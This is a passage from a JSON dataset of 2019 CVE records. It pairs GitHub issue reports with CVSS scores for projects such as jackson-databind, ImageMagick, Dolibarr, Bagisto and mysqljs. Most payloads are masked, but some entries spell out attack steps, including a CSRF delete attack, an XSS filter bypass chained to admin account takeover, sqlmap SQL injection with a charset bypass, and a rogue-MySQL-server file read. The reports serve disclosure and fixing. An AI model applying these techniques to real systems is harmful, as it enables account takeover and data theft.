        "description": "Net/URL: APITAG Multiple Parsing Issues. APITAG What version of Go are you using ( go version )? APITAG $ go version go version APITAG windows/amd NUMBERTAG APITAG Does this issue reproduce with the latest release? Yes What operating system and processor architecture are you using ( go env )? APITAG APITAG APITAG go env APITAG Output APITAG APITAG APITAG $ go env set GOARCH=amd NUMBERTAG set GOBIN= set PATHTAG set FILETAG set GOFLAGS= set GOHOSTARCH=amd NUMBERTAG set GOHOSTOS=windows set GOOS=windows set PATHTAG set GOPROXY= set GORACE= set GOROOT=C:\\Go set GOTMPDIR= set PATHTAG set GCCGO=gccgo set CC=gcc set CXX=g++ set CGO_ENABLED NUMBERTAG set GOMOD= set CGO_CFLAGS= g O2 set CGO_CPPFLAGS= set CGO_CXXFLAGS= g O2 set CGO_FFLAGS= g O2 set CGO_LDFLAGS= g O2 set PKG_CONFIG=pkg config set GOGCCFLAGS= m NUMBERTAG mthreads fno caret diagnostics Qunused arguments fmessage length NUMBERTAG PATHTAG gno record gcc switches APITAG APITAG What did you do? APITAG While playing around with APITAG I found a few problems I'd like to share. I'll gladly share more details if anything is unclear or if someone is interested. Normally, APITAG when parsed by APITAG has no APITAG But APITAG has a hostname of APITAG This can be taken further... APITAG has a hostname of APITAG and will pop an alert if relocated to by a browser (after decoding) IP NUMBERTAG support also has it's issues... this URL APITAG has the hostname of APITAG But also do all of these: APITAG APITAG APITAG Even without thinking about how this would interact with other systems and parsers, Just considering code used URL hostname validations and Go's https functions ( APITAG for instance) leveraging APITAG should explain how this could be used maliciously. Again, will be glad to provide more details if needed. All POCs can be found here URLTAG What did you expect to see? Errors for most of it... What did you see instead? Hostnames",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-14859",
        "Issue_Url_old": "https://github.com/warner/python-ecdsa/issues/114",
        "Issue_Url_new": "https://github.com/tlsfuzzer/python-ecdsa/issues/114",
        "Repo_new": "tlsfuzzer/python-ecdsa",
        "Issue_Created_At": "2019-09-25T19:03:04Z",
        "description": "Inconsistent handling of malformed DER signatures. When the DER signature is malformed, the APITAG raises unexpected exceptions and in some cases does not raise any exception. ERRORTAG , ERRORTAG and ERRORTAG are raised in addition to ERRORTAG , at the same time flipping the NUMBERTAG th or NUMBERTAG th least significant bit of NUMBERTAG nd byte of a NIST NUMBERTAG p signature does not cause it to be rejected (the DER encoding is strict, and every value has one defined encoding, any other encoding is invalid and needs to be rejected)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-14864",
        "Issue_Url_old": "https://github.com/ansible/ansible/issues/63522",
        "Issue_Url_new": "https://github.com/ansible/ansible/issues/63522",
        "Repo_new": "ansible/ansible",
        "Issue_Created_At": "2019-10-15T19:52:04Z",
        "description": "Sumologic callback plugin logging sensitive data. SUMMARY The sumologic plugin logs sensitive data because no_log is not respected for arguments/vars passed to modules via the APITAG object ISSUE TYPE Bug Report COMPONENT NAME code where ansible_task is defined: URLTAG ANSIBLE VERSION CODETAG CONFIGURATION CODETAG OS / ENVIRONMENT APITAG NUMBERTAG STEPS TO REPRODUCE Configure a APITAG endpoint and add configuration to ansible.cfg you can find an example of our callback configs above. Below we are using a custom module, but this also happens with every other module we've tested. The module we wrote, inventory_node, has no_log: True specified on the api_key argument. This also happens if no_log: true is passed to any task. yaml name: create node in inventory via inventory_node module delegate_to: localhost connection: local inventory_node: node_name: \"{{ inventory_hostname }}\" internal_ip: \"{{ internal_ip }}\" role_id: \"{{ role_id }}\" datacenter_id: \"{{ datacenter_id }}\" cluster: \"{{ cluster | default(omit) }}\" instance_id: \"{{ instance_id | default(omit) }}\" api_key: \"{{ inventory_api_key }}\" state: present EXPECTED RESULTS I would expect that we not see the api key show up in APITAG ACTUAL RESULTS We see the api key show up in our APITAG logs. Below is the full JSON payload that is sent and received. The APITAG object correctly removes the sensitive field, but APITAG object does not. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-14892",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2462",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2462",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2019-09-19T06:22:53Z",
        "description": "new gadgets which can cause RCE. Hey, buddy. I notice total NUMBERTAG gadgets can be used to exploit fastjson which can cause RCE. Some of these may works for jackson as well. Please analysis these gadgets. PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-14893",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2469",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2469",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2019-09-20T06:20:34Z",
        "description": "Block one more gadget type (xalan2). Another gadget ( ) type report regarding a class of xalan . Mitre id: not yet allocated Reporter: MENTIONTAG (via NUMBERTAG originally) ( ) See URLTAG for more on general problem type",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-14924",
        "Issue_Url_old": "https://github.com/swisspol/GCDWebServer/issues/433",
        "Issue_Url_new": "https://github.com/swisspol/gcdwebserver/issues/433",
        "Repo_new": "swisspol/gcdwebserver",
        "Issue_Created_At": "2019-08-07T15:27:55Z",
        "description": "Security issue of APITAG The method APITAG in APITAG class checks the APITAG of APITAG but not the APITAG By taking this error, adversary can make un accessible file to be available, credential of the app for instance. I have found real app affected by this vulnerability.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-14933",
        "Issue_Url_old": "https://github.com/bagisto/bagisto/issues/750",
        "Issue_Url_new": "https://github.com/bagisto/bagisto/issues/750",
        "Repo_new": "bagisto/bagisto",
        "Issue_Created_At": "2019-03-27T13:23:39Z",
        "description": "Cross site request forgery . Vulnerable link: URLTAG What is CSRF ? A CSRF attack forces a logged on victims browser to send a forged HTTP request, including the victims session cookie and any other automatically included authentication information, to a vulnerable web application. Vulnerable Page: Admin Panel menu FILETAG Task: To remove items from table without account owner consent. How to detect the vulnerability? It is fairly easy to detect csrf vulnerability via automated tools or code analysis. Here, we will directly look at the href urls of the Delete button which submits value without csrf token using inspect element in the browser. How to reproduce the attack? Step1: Admin (victim) signs into Bagisto admin panel and does not sign off or doesn't close browser. Step2: Admin (victim) opens tab (attacker controlled website with auto load request containing information the attacker wants to delete), details of request sent to bagisto server, auto loads evil script to delete items from the list. Step3: Browser executes evil script on attackers behalf and updates the list. Malicious page containing evil script to edit list NUMBERTAG Delete users on admin panel: No csrf token used on customer delete button. The attacker needs to send a link to page containing below code which will be executed when opened in victims browser. CODETAG NUMBERTAG Deleting review on admin panel: URLTAG NUMBERTAG deleting group: URLTAG NUMBERTAG Locales: URLTAG NUMBERTAG Currencies: URLTAG NUMBERTAG Exchange rates: URLTAG NUMBERTAG Inventory sources: URLTAG NUMBERTAG channels: URLTAG NUMBERTAG Users: URLTAG NUMBERTAG Sliders: URLTAG Impacts of vulnerability: Using this flaw an attacker can remove important functionality of the application which results into denial of most of the services on the store. Prevention Cheat sheet for developers: FILETAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-14939",
        "Issue_Url_old": "https://github.com/mysqljs/mysql/issues/2257",
        "Issue_Url_new": "https://github.com/mysqljs/mysql/issues/2257",
        "Repo_new": "mysqljs/mysql",
        "Issue_Created_At": "2019-08-10T14:49:53Z",
        "description": "LOAD DATA LOCAL INFILE option shouldn't be open by default.. impact This may cause arbitrary file read vulnerability. how to do This is my client code: ERRORTAG Use this rogue mysql tool URLTAG on my server. We can just read any file from my computer. FILETAG Although it throws an error, it doesn't matter. how to fix I'm not familiar with source code. But just turn off the LOAD DATA LOCAL INFILE option by default.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-14968",
        "Issue_Url_old": "https://github.com/peacexie/imcat/issues/2",
        "Issue_Url_new": "https://github.com/peacexie/imcat/issues/2",
        "Repo_new": "peacexie/imcat",
        "Issue_Created_At": "2019-08-06T03:03:00Z",
        "description": "the vulnerability report: sql injection vulnerability in FILETAG page . . Exploit vulnerability \uff1a Use sqlmap( URLTAG and use sqlmap tamper : unmagicquotes payload: ERRORTAG FILETAG ERRORTAG GET databases; FILETAG Build install imcat and test vuln: FILETAG FILETAG FILETAG The Vuln src code: FILETAG because php code set database charset=GBK so bypass addslashes or GPC . Safetity up NUMBERTAG mysql database charset UTF NUMBERTAG Checking http input(GET/POST) data fiter dangerous that.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-14976",
        "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/71",
        "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/71",
        "Repo_new": "idreamsoft/iCMS",
        "Issue_Created_At": "2019-08-01T20:28:45Z",
        "description": "iCMS NUMBERTAG reflected XSS. FILETAG POC APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-14980",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick6/issues/43",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick6/issues/43",
        "Repo_new": "imagemagick/imagemagick6",
        "Issue_Created_At": "2019-04-22T02:28:38Z",
        "description": "Use after free in magick/blob.c. In magick/blob.c line NUMBERTAG the function APITAG freed the object 'blob_info >data', but it did't set the point null. The code returned this dangling point in line NUMBERTAG it will cause UAF in this code.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-14981",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1552",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1552",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-04-18T06:16:56Z",
        "description": "DIVIDE_BY_ZERO in feature.c. APITAG In line NUMBERTAG it assgin 'count NUMBERTAG the code make a loop as 'for (v=( ((ssize_t) height NUMBERTAG ssize_t) height NUMBERTAG the 'count++' in this loop and the APITAG in line NUMBERTAG But the count is NUMBERTAG in some cases. It may happen DIVIDE_BY_ZERO case if the code don't get in this loop.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-14982",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/960",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/960",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2019-07-15T02:53:48Z",
        "description": "buffer overflow in PATHTAG Describe the bug I found a buffer overflow bugs in PATHTAG due to integer overflow. To Reproduce Steps to reproduce the behaviour: PATHTAG APITAG Expected behavior In APITAG integer overflow occurs when data_size is less than header_size, and it will cause buffer overflow in '&data FILETAG ERRORTAG The poc is here: Just do PATHTAG APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-14993",
        "Issue_Url_old": "https://github.com/envoyproxy/envoy/issues/7728",
        "Issue_Url_new": "https://github.com/envoyproxy/envoy/issues/7728",
        "Repo_new": "envoyproxy/envoy",
        "Issue_Created_At": "2019-07-26T00:42:53Z",
        "description": "route regex match fails for large URIs. Title : route regex match fails for large URIs Description : >We've noticed that requests with a very long URI crashes our envoy service for routes defined using a regex matcher. We're not sure if it's due to some overflow bug in Envoy's regex parser, but ideally Envoy should not crash because of a long URI. Repro steps : > Define a route with a match regex like the following: APITAG and then make a request with a large URI: APITAG We've gotten around it by using a prefix matcher instead, but this appears to be a potential APITAG vulnerability if not a security issue.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-15052",
        "Issue_Url_old": "https://github.com/gradle/gradle/issues/10278",
        "Issue_Url_new": "https://github.com/gradle/gradle/issues/10278",
        "Repo_new": "gradle/gradle",
        "Issue_Created_At": "2019-08-14T19:06:06Z",
        "description": "DISCUSSION] CVETAG : Repository authentication sent to server of HTTP redirection response. This issue is to discuss [ CVETAG URLTAG and answer any questions that people may have. Our official advisory can be found here: URLTAG Below is the contents of the original vulnerability disclosure reported by MENTIONTAG Expected Behavior If basic authentication is configured for a Maven repository credentials are only sent to the hostname configured. Current Behavior If the Maven repository responds with an HTTP redirection response (e.g. PATHTAG ) to a different hostname Gradle _includes_ the basic authorization header. Some may consider this an information disclosure security issue. Context Some Maven repositories may perform HTTP redirects to serve large binaries from via a CDN; an example of this is Artifactory's Direct Cloud Storage Download URLTAG feature. This Artifactory feature ultimately uses a S3 signed URL as a HTTP redirect. However the S3 request fails because there is authorization in the URL and Gradle sends the _unrelated_ basic authentication header. Steps to Reproduce I have created a full working example of this issue: Clone URLTAG Execute APITAG Build will fail with a APITAG response error The underlaying cause of the NUMBERTAG error is slightly difficult to diagnose because Gradle does not output the text of the response, so I'm including screen shots of the request and responses using a local HTTP proxy. APITAG Request and response to my _fake_ Maven repository: APITAG APITAG Request and response to S3 URL. Note the actual bug is that the header APITAG is being sent to the server APITAG . APITAG APITAG Environment Sample project is configured to use the latest Gradle release NUMBERTAG Please feel free to leave any questions you may have below. Please report any new security vulnerabilities to FILETAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-15058",
        "Issue_Url_old": "https://github.com/nothings/stb/issues/790",
        "Issue_Url_new": "https://github.com/nothings/stb/issues/790",
        "Repo_new": "nothings/stb",
        "Issue_Created_At": "2019-08-13T08:52:36Z",
        "description": "heap buffer overflow in stbi__tga_load with version NUMBERTAG I find heap buffer overflow in stbi__tga_load with lastest version NUMBERTAG POC: ERRORTAG In command: APITAG Output: ERRORTAG Analyze this bug: In this poc,when the program call stbi__tga_load: ERRORTAG It will call malloc NUMBERTAG because of specific data finally but after: CODETAG So it will read tga_palette[pal_idx+j] which leads to heap buffer overflow This may lead to the leak of the uninitialized data on the heap and so on......",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-15062",
        "Issue_Url_old": "https://github.com/Dolibarr/dolibarr/issues/11671",
        "Issue_Url_new": "https://github.com/dolibarr/dolibarr/issues/11671",
        "Repo_new": "dolibarr/dolibarr",
        "Issue_Created_At": "2019-08-09T10:21:02Z",
        "description": "Stored XSS > CSRF > Admin Account Takeover. Bug Hello Team, Dolibar NUMBERTAG alpha suffers from a Stored XSS in the Label field of Link a new file/document in Linked Files of the User. An attacker could use this feature to introduce a CSRF which would completely takeover admin's account. The protection for CSRF is restricted to referrer header and so if a CSRF request is stored inside the application, this feature is bypassed leading to change of account details. Moving to XSS, the various protections do just display an error message when certain keywords forming an XSS payload. This can be easily bypassed by using an object tag with base NUMBERTAG encoding our payload inside it. For to convert the XSS to CSRF, i'm using the iframe tag inside the object tag to load my CSRF request in its src attribute. How to takeover admin account? A request is sent to FILETAG where various details of admin can be changed i.e id NUMBERTAG The attacker just needs the login username of the admin with some random values in firstname and lastname to successfully submit a request. In this request password of admin can be changed, because it does'nt have field to enter previous password for validation. Hence it can be used to submit new password for admin and hence taking over admin account. Environment Version NUMBERTAG alpha OS : Windows NT IN NUMBERTAG L NUMBERTAG build NUMBERTAG APITAG NUMBERTAG AMD NUMBERTAG Web server : APITAG APITAG APITAG PHP NUMBERTAG PHP NUMBERTAG Database : APITAG or APITAG NUMBERTAG APITAG URL(s) : URLTAG > XSS/CSRF FILETAG > CSRF request sent to this URL Expected and actual behavior Expected behaviour: The application should block insertion of tags in pages which would lead to these issues. Actual behaviuor: The application doesn't block tags and hence leads to XSS/CSRF Steps to reproduce the behavior NUMBERTAG Login to user account as we will send a request from user to admin, just to show severity of impact. Here i'm logging into user asd and go to user card and click on Linked APITAG Tab FILETAG NUMBERTAG You will see that a user cannot add the Link a new file/document. To bypass this just open inspect element and hover to LINK box. FILETAG NUMBERTAG Now remove the value disabled=\"\" from the tag. The link will now be activated. FILETAG NUMBERTAG Now add the value asdasd.com to URL and APITAG in the Label This is an iframe with source as a csrf file. APITAG is the payload which is base NUMBERTAG encoded. You can add any source like upload it to your server as FILETAG . A new file will be added on behalf of user. FILETAG NUMBERTAG Add the following code as FILETAG ERRORTAG NUMBERTAG Now the attack vector is set. Now only the attacker needs to open the linked files page for the user. Login with admin user and head to all users > asdasd asd. FILETAG As you can see in image FILETAG the admin firstname and lastname is admin admin. Now lets open the user asdasd asd. Head to Users & Groups tab > Click on user asdasd asd APITAG FILETAG Head to Linked files of user. FILETAG If you will see that the iframe is seen on the webpage which executes our CSRF succcessfullly changing the details of admin NUMBERTAG Now open admin profile again. You will see the name has changed to hacked asd. The attacker can even change the password of the admin and takeover his account. In this case I have changed the password of admin to admin NUMBERTAG FILETAG Suggested steps In most situations where user controllable data is copied into application responses, cross site scripting attacks can be prevented using two layers of defenses NUMBERTAG Input should be validated as strictly as possible on arrival, given the kind of content that it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well defined regular expression. Input which fails the validation should be rejected, not sanitized NUMBERTAG User input should be HTML encoded at any point where it is copied into application responses. All HTML metacharacters, including < > \" ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non trivial task. Here the xss protection is by using blacklist. Please don't use that, instead use the above mentioned approach",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.0,
        "impactScore": 5.9,
        "exploitabilityScore": 2.1
    },
    {
        "CVE_ID": "CVE-2019-15095",
        "Issue_Url_old": "https://github.com/wkeyuan/DWSurvey/issues/48",
        "Issue_Url_new": "https://github.com/wkeyuan/dwsurvey/issues/48",
        "Repo_new": "wkeyuan/dwsurvey",
        "Issue_Created_At": "2019-08-13T11:38:03Z",
        "description": "[security vulnerability] Reflective XSS when view the survey result. There is a Reflective XSS vulnerability when user view the survey result. The failure of the XSS filter to work properly resulted in this vulnerability\uff0c which allows remote attackers to inject arbitrary web script or stole admin's or other users cookies. The impact of the problem is serious especially when combined with CSRF vulnerability exploitation. Vulnerability file: PATHTAG APITAG PATHTAG ('XSS');</script NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-15119",
        "Issue_Url_old": "https://github.com/cnlh/nps/issues/176",
        "Issue_Url_new": "https://github.com/ehang-io/nps/issues/176",
        "Repo_new": "ehang-io/nps",
        "Issue_Created_At": "2019-08-14T16:03:43Z",
        "description": "Permission problems on NPS Install. Dear NPS, I would like to report a security vulnerability in NPS. There is a problem with file permission that allow regular access to write or access information that they are not supposed to. On the file install.go, the nps file is copied to PATHTAG or PATHTAG but then permission are changed to NUMBERTAG through a call to APITAG allowing every user to modify the binary. A potential attacker could replace the binary to something malicious and the next time a valid user run it, it will be executing the attacker's file. func APITAG { [...] if APITAG { if _, err := APITAG \"nps\"), PATHTAG ); err != nil { if _, err := APITAG \"nps\"), PATHTAG ); err != nil { APITAG } else { APITAG PATHTAG NUMBERTAG Wrong Permission set APITAG files have been copied to\", PATHTAG ) } } else { APITAG PATHTAG NUMBERTAG Wrong Permission set APITAG files have been copied to\", PATHTAG ) } Please let me know when you have fixed the vulnerability so that I can coordinate my disclosure with yours. For reference, here is a link to Semmle's vulnerability disclosure policy: URLTAG Thank you, Nico Waisman Semmle Security Research Team",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-15136",
        "Issue_Url_old": "https://github.com/eProsima/Fast-RTPS/issues/443",
        "Issue_Url_new": "https://github.com/eprosima/fast-dds/issues/443",
        "Repo_new": "eprosima/fast-dds",
        "Issue_Created_At": "2019-03-08T03:09:03Z",
        "description": "Partition permission are not enforced for remote participants . Partition permissions are presently only checked when creating local data readers/writers, and are consequently skipped when checking remote readers/writers within the current default Access Control plugin implementation. This effectively nullifies any permission restrictions mandated in the remote participant's permission file, given it must be checked locally to ensure any access control policy is faithfully enforced. The flowing is a minimal example where only the partition permission checks for creating local data readers/writers are disabled for testing, while leaving the APITAG and APITAG fully intact. The secure publisher and subscriber are altered to connect over a common partition that is non existent in either of the participant's permissions, i.e. the only valid partition allowed by the permission policy is that of the empty string. Such altered fast rtps publisher and subscriber while successfully connect with each other, while consequently fail to connect to other secure dds implementation (that happen to properly provisioned with the sufficient partition permission). ERRORTAG I tried patching the APITAG APITAG classes to bubble up the necessary partition name context, thus allow for APITAG checks (presently absent) to be evokable in the APITAG and APITAG callbacks, however I have yet to have time to comb through layers of generic types and call sites to find where such a context (the partition name connecting the remote participant) could be passed along. As with URLTAG , this was uncovered during my development of a formal verification framework for the default DDS Security Access Control plugins and procedurally generated permission files.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-15137",
        "Issue_Url_old": "https://github.com/eProsima/Fast-RTPS/issues/441",
        "Issue_Url_new": "https://github.com/eprosima/fast-dds/issues/441",
        "Repo_new": "eprosima/fast-dds",
        "Issue_Created_At": "2019-03-08T01:59:51Z",
        "description": "Misuse of fnmatch used by DDS Security Access Control. The following two way fnmatch implementation allows for remote data readers/writers to use the topic name string as the expression to pattern match against its respective permissions: URLTAG This is counter to the OMG DDS Security specification for the default Access Control plugin, given that only the permission expressions themselves should be evaluated as the pattern when matching the POSIX fnmatch function. This can be illustrated by modifying the APITAG to communicate over the selected side channel APITAG without necessarily updating the provided permissions; that otherwise explicitly deny all topics excluding APITAG : CODETAG This issue seems to have persist from release NUMBERTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-15139",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1553",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1553",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-04-20T13:04:54Z",
        "description": "APITAG Invalid read at APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description When reading on XWD files APITAG may suffer from a crash caused by invalid memory read. Steps to Reproduce run APITAG or APITAG . A report from an APITAG copmiled APITAG is like this: ERRORTAG System Configuration APITAG version NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG LTS NUMBERTAG Additional information: This was firstly detected when fuzzing APITAG POCs: FILETAG FILETAG Other information available here URLTAG .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-15140",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1554",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1554",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-04-27T07:14:42Z",
        "description": "APITAG heap use after free at APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG convert suffers from a heap use after free vulnerability. Steps to Reproduce run APITAG ERRORTAG POC files are available here URLTAG . System Configuration APITAG APITAG version NUMBERTAG Q NUMBERTAG a NUMBERTAG ae) Environment APITAG system, version and so on): Ubuntu NUMBERTAG LTS NUMBERTAG Additional information: It reports an assertion failure with regular debug mode compilation.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-15141",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1560",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1560",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-04-28T11:01:35Z",
        "description": "APITAG heap buffer overflow at APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG ( URLTAG still suffers from heap buffer overflow error after with the patch that stresses URLTAG . Steps to Reproduce Run APITAG When linked with prebuilt libtiff.so from Ubuntu NUMBERTAG LTS NUMBERTAG APITAG reports: ERRORTAG System Configuration APITAG version NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG LTS NUMBERTAG Additional information:",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-15146",
        "Issue_Url_old": "https://github.com/gopro/gpmf-parser/issues/60",
        "Issue_Url_new": "https://github.com/gopro/gpmf-parser/issues/60",
        "Repo_new": "gopro/gpmf-parser",
        "Issue_Created_At": "2019-05-17T09:21:41Z",
        "description": "Multiple crashes when parsing MP4 files. As of e NUMBERTAG b NUMBERTAG when running APITAG , it may report with crashes when building with APITAG Please see below for details.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-15151",
        "Issue_Url_old": "https://github.com/adplug/adplug/issues/91",
        "Issue_Url_new": "https://github.com/adplug/adplug/issues/91",
        "Repo_new": "adplug/adplug",
        "Issue_Created_At": "2019-08-09T07:51:21Z",
        "description": "Double free in APITAG Hi, While fuzzing APITAG with American Fuzzy Lop, I found a double free in in APITAG in src/u6m.h L NUMBERTAG Attaching a reproducer (gzipped so APITAG accepts it): FILETAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
